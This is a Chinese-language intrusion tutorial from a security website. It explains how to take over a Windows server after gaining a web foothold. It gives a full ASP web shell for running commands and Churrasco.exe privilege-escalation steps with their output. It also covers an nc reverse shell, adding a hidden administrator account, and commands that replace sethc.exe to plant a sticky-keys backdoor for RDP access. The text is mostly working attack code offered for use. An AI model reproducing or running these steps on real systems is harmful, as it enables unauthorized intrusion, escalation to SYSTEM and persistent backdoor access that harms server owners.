首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
利用Shift后门提权入侵服务器方法
来源:vfocus.net 作者:vfocus 发布时间:2010-07-28  

提权时要到的工具如下:cmd.exe Churrasco.exe nc.exe

用以上工具先要确定SHELL里 wscript.shell 命令行执行组件是否可用!如不能用用以下方法进行调用!如调用也不行!那么就请你另想办法!

代码如下:
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object> <% end if %> <form method="post"> <input type=text name="cmdx" size=60 value="C:\RECYCLER\cmd.exe"><br> <input type=text name="cmd" size=60><br> <input type=submit value="net user"></form> <textarea readonly cols=80 rows=20> <%On Error Resume Next if request("cmdx")="C:\RECYCLER\cmd.exe" then response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall end if response.write oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall %> </textarea>

  将以上代码保存为cmd.asp上传到SHELL里 再访问这个CMD.asp如没有出错等就说明可以执行CMD命令!

  下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功 原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功 但出现/churrasco/-->Current User: NETWORK SERVICE

  /churrasco/-->Getting Rpcss PID ...

  /churrasco/-->Found Rpcss PID: 696

  /churrasco/-->Searching for Rpcss threads ...

  /churrasco/-->Found Thread: 444

  /churrasco/-->Thread not impersonating, looking for another thread...

  /churrasco/-->Found Thread: 700

  /churrasco/-->Thread not impersonating, looking for another thread...

  /churrasco/-->Found Thread: 704

  /churrasco/-->Thread not impersonating, looking for another thread...

  /churrasco/-->Found Thread: 712

  /churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0xf24

  /churrasco/-->Getting SYSTEM token from Rpcss Service...

  /churrasco/-->Found szywjs Token

  /churrasco/-->Found SYSTEM token 0xf1c

  /churrasco/-->Running command with SYSTEM Token...

 

  直到这里 没有出现命令执行成功 那么这时你千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了!

 

  在反弹回来的CMDSHELL里执行 C:\RECYCLER\Churrasco.exe "net user iisuser iisuser /add”

  C:\RECYCLER\Churrasco.exe "net localgroup administrators iisuser /add"

  C:\RECYCLER\Churrasco.exe 这里是你所传到的目录!这样可以说90%的出现命令执行成功!这样就可以进行3389连接了!

 

  如果说这时没有出现命令执行成功 下面我就再告诉你一种方法!

  如下 依次执行:

  attrib c:\windows\system32\sethc.exe -h -r -s

  attrib c:\windows\system32\dllcache\sethc.exe -h -r -s

  del c:\windows\system32\sethc.exe

  copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

  copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

  attrib c:\windows\system32\sethc.exe +h +r +s

  attrib c:\windows\system32\dllcache\sethc.exe +h +r +s

 

  如果出现拒绝等错误 那就没法了!如果说这台服务器先是被别人拿过了做了shift后门 那么就是100%成功!本人亲自用这方法成功替换过别人带有密码的SHIFT后门!

  还有一点就是在webSHELL里或CMDSHELL下也可以这样执行!

  C:\RECYCLER\Churrasco.exe "copy d:\windows\explorer.exe d:\windows\system32\sethc.exe"

  C:\RECYCLER\Churrasco.exe "copy d:\windows\system32\sethc.exe d:\windows\system32\dllcache\sethc.exe "

  还有就是attrib 加属性等也可以这样执行!还有一点忘了就是在反弹回来的CMDSHELL里用这种方法也可以!

  这样就可以利用SHIft后门成功拿下服务器了


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·DEDECMS后台另类拿Shell方法
·Z-BLOG后台getshell方法
·传递哈希入侵技术
·ECSHOP 搜索注入漏洞利用exp及后
·帝国cms后台拿shell
·Windows文件系统漏洞-小漏洞,大
·丢掉NC,介绍一种新的上传shell
·php168新版后台模板拿shell
·寻找绝对隐蔽的后门的办法
·Dump freebsd dir entries using
·测试一下录像效果视频,顺带说一
·使用Adsutil.vbs脚本获取IIS配置
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved